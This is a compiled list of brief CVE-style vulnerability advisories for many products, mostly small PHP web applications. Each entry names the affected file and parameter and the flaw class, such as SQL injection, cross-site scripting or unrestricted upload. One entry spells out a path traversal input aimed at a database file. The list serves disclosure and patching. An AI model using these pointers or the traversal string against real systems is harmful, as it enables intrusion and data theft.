A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php. The manipulation of the argument uuid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257198 is the identifier assigned to this vulnerability.
A vulnerability has been found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this vulnerability is an unknown functionality of the file api/client/down_file.php. The manipulation of the argument uuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257197 was assigned to this vulnerability.
kedi ElectronCord is a bot management tool for Discord. Commit aaaeaf4e6c99893827b2eea4dd02f755e1e24041 exposes an account access token in the `config.json` file. Malicious actors could potentially exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions on behalf of the repository owner. As of time of publication, it is unknown whether the owner of the repository has rotated the token or taken other mitigation steps aside from informing users of the situation.
A vulnerability was found in SourceCodester File Manager App 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update-file.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257182 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Employee Task Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /update-employee.php. The manipulation of the argument admin_id leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257080.
A vulnerability, which was classified as critical, was found in SourceCodester Employee Task Management System 1.0. This affects an unknown part of the file /update-admin.php. The manipulation of the argument admin_id leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257079.
A vulnerability, which was classified as critical, has been found in SourceCodester Employee Task Management System 1.0. Affected by this issue is some unknown functionality of the file /task-details.php. The manipulation of the argument task_id leads to authorization bypass. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257078 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Employee Task Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /edit-task.php. The manipulation of the argument task_id leads to authorization bypass. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257077 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Employee Task Management System 1.0. Affected is an unknown function of the file /task-info.php. The manipulation leads to execution after redirect. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257076.
A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /task-details.php. The manipulation leads to execution after redirect. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257075.
A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /manage-admin.php. The manipulation leads to execution after redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257074 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file /edit-task.php. The manipulation leads to execution after redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257073 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin-manage-user.php. The manipulation leads to execution after redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257072.
A vulnerability has been found in heyewei JFinalCMS 5.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/div_data/delete?divId=9 of the component Custom Data Page. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257071.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in jurecapuder AndroidWeatherApp 1.0.0 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. VDB-257070 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The code maintainer was contacted early about this disclosure but did not respond in any way. Instead the GitHub repository got deleted after a few days. We have to assume that the product is not supported anymore.
A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240313. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file api/client/get_extension_yl.php. The manipulation of the argument imei leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257065 was assigned to this vulnerability.
A vulnerability was found in PandaXGO PandaX up to 20240310. It has been classified as critical. Affected is an unknown function of the file /apps/system/router/upload.go of the component File Extension Handler. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257064.
A vulnerability was found in kishor-23 Food Waste Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/admin.php. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257056. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file attendance-info.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257055.
A vulnerability was found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update-admin.php. The manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257054 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file update-employee.php. The manipulation of the argument admin_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257053 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Product Review Rating System 1.0. Affected is an unknown function of the component Rate Product Handler. The manipulation of the argument Your Name/Comment leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257052.
A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/users.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256972. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/users.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256971. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this issue is some unknown functionality of the file /admin/update-users.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256970 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/update-users.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256969 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected is an unknown function of the file /admin/update-rooms.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256968. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/update-rooms.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256967. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/rooms.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256966 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/update-rooms.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256965 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/rooms.php. The manipulation of the argument room_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256964. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/rooms.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected is an unknown function of the file /admin/receipt.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256962 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This issue affects some unknown processing of the file /admin/receipt.php. The manipulation of the argument room_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This vulnerability affects unknown code of the file /admin/booktime.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256960. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/booktime.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256959. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/bookdate.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256958 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/bookdate.php. The manipulation of the argument room_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256957 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been classified as problematic. Affected is an unknown function of the file navbar.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256956. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This issue affects some unknown processing of the file book_history.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256955. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. This vulnerability affects unknown code of the file book_history.php. The manipulation of the argument del_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256954 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file home.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256953 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this issue is some unknown functionality of the file home.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256952. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this vulnerability is an unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256951. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in RaspAP raspap-webgui 3.0.9 and classified as critical. This issue affects some unknown processing of the file includes/provider.php of the component HTTP POST Request Handler. The manipulation of the argument country leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256919. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Surya2Developer Hostel Management Service 1.0. This issue affects some unknown processing of the file /change-password.php of the component Password Change Handler. The manipulation of the argument oldpassword leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256889 was assigned to this vulnerability.
A vulnerability has been found in Surya2Developer Hostel Management Service 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /check_availability.php of the component HTTP POST Request Handler. The manipulation of the argument oldpassword leads to observable response discrepancy. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256891.
A vulnerability, which was classified as critical, was found in Surya2Developer Hostel Management System 1.0. Affected is an unknown function of the file /admin/manage-students.php. The manipulation of the argument del leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256890 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in MHA Sistemas arMHAzena 9.6.0.0. This vulnerability affects unknown code of the component Executa Page. The manipulation of the argument Companhia/Planta/Agente de/Agente até leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256888. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in MHA Sistemas arMHAzena 9.6.0.0. This affects an unknown part of the component Cadastro Page. The manipulation of the argument Query leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256887. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.
Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. Vyper compiler allows passing a value in builtin raw_call even if the call is a delegatecall or a staticcall. But in the context of delegatecall and staticcall the handling of value is not possible due to the semantics of the respective opcodes, and vyper will silently ignore the value= argument. If the semantics of the EVM are unknown to the developer, he could suspect that by specifying the `value` kwarg, exactly the given amount will be sent along to the target. This vulnerability affects 0.3.10 and earlier versions.
A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view_order.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256705 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/add-admin.php. The manipulation of the argument avatar leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256454 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file add_user.php. The manipulation of the argument city leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256453 was assigned to this vulnerability.
A vulnerability was found in EVE-NG 5.0.1-13 and classified as problematic. Affected by this issue is some unknown functionality of the component Lab Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256442 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
libcurl skips the certificate verification for a QUIC connection under certain conditions, when built to use wolfSSL. If told to use an unknown/bad cipher or curve, the error path accidentally skips the verification and returns OK, thus ignoring any certificate problems.
A vulnerability classified as problematic was found in Musicshelf 1.0/1.1 on Android. Affected by this vulnerability is an unknown functionality of the file io\fabric\sdk\android\services\network\PinningTrustManager.java of the component SHA-1 Handler. The manipulation leads to password hash with insufficient computational effort. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-256321 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Musicshelf 1.0/1.1 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256320.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in AOL AIM Triton 1.0.4. It has been declared as problematic. This vulnerability affects unknown code of the component Invite Handler. The manipulation of the argument CSeq leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256318 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability has been found in keerti1924 Secret-Coder-PHP-Project 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /secret_coder.sql. The manipulation leads to inclusion of sensitive information in source code. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Dreamer CMS 4.1.3. Affected is an unknown function of the file /admin/menu/toEdit. The manipulation of the argument id leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in CodeAstro Ecommerce Site 1.0. Affected by this vulnerability is an unknown functionality of the file action.php of the component Search. The manipulation of the argument cat_id/brand_id/keyword leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256303.
A vulnerability classified as critical has been found in CodeAstro Membership Management System 1.0. Affected is an unknown function of the file /add_members.php. The manipulation of the argument fullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256284.
A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/maintenance/manage_category.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256283.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256281 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/list_resource_icon.php?action=delete. The manipulation of the argument IconId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256280. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ZKTeco ZKBio Media 2.0.0_x64_2024-01-29-1028. It has been classified as problematic. Affected is an unknown function of the file /pro/common/download of the component Service Port 9999. The manipulation of the argument fileName with the input ../../../../zkbio_media.sql leads to path traversal: '../filedir'. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This issue affects some unknown processing of the file /prescription/prescription/delete/ of the component Prescription Page. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This vulnerability affects unknown code of the file /billing/bill/edit/ of the component Update Bill Page. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in boyiddha Automated-Mess-Management-System 1.0. Affected by this issue is some unknown functionality of the file /member/member_edit.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-256052. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in boyiddha Automated-Mess-Management-System 1.0. Affected by this vulnerability is an unknown functionality of the file /member/chat.php of the component Chat Book. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256051. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in boyiddha Automated-Mess-Management-System 1.0. Affected is an unknown function of the file /member/view.php. The manipulation of the argument date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256050 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component Login Page. The manipulation of the argument useremail leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256048. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bdtask G-Prescription Gynaecology &amp; OBS Consultation Software 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Setting/change_password_save of the component Password Reset Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256046 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Bdtask G-Prescription Gynaecology &amp; OBS Consultation Software 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Venue_controller/edit_venue/ of the component Edit Venue Page. The manipulation of the argument Venue map leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256045 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Bdtask G-Prescription Gynaecology &amp; OBS Consultation Software 1.0. Affected is an unknown function of the component OBS Patient/Gynee Prescription. The manipulation of the argument Patient Title/Full Name/Address/Cheif Complain/LMP/Menstrual Edd/OBS P/OBS Alc/Medicine Name/Medicine Type/Ml/Dose/Days/Comments/Template Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256044. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Bdtask G-Prescription Gynaecology &amp; OBS Consultation Software 1.0. This issue affects some unknown processing of the file /Home/Index of the component Prescription Dashboard. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256043. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in keerti1924 Online-Book-Store-Website 1.0. This vulnerability affects unknown code of the file /home.php of the component HTTP POST Request Handler. The manipulation of the argument product_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256042 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in keerti1924 Online-Book-Store-Website 1.0. This affects an unknown part of the file /shop.php of the component HTTP POST Request Handler. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256041 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /signup.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256040. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation of the argument search leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256039. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been classified as critical. Affected is an unknown function of the file /product_update.php?update=1. The manipulation of the argument update_image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256038 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0 and classified as problematic. This issue affects some unknown processing of the file /shop.php. The manipulation of the argument product_price leads to business logic errors. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256037 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in keerti1924 Secret-Coder-PHP-Project 1.0 and classified as problematic. This vulnerability affects unknown code of the file /login.php of the component Login Page. The manipulation of the argument emailcookie/passwordcookie leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256036. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in keerti1924 PHP-MYSQL-User-Login-System 1.0. This affects an unknown part of the file login.sql. The manipulation leads to inclusion of sensitive information in source code. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256035. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in keerti1924 PHP-MYSQL-User-Login-System 1.0. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256034 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/operations/expense_category.php of the component HTTP POST Request Handler. The manipulation of the argument status leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255678 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been classified as critical. Affected is an unknown function of the file admin_class.php. The manipulation of the argument img leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255588.
A vulnerability was found in SourceCodester Best POS Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255587.
A vulnerability has been found in SourceCodester Online Mobile Management Store 1.0 and classified as critical. This vulnerability affects unknown code of the file view_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255586 is the identifier assigned to this vulnerability.
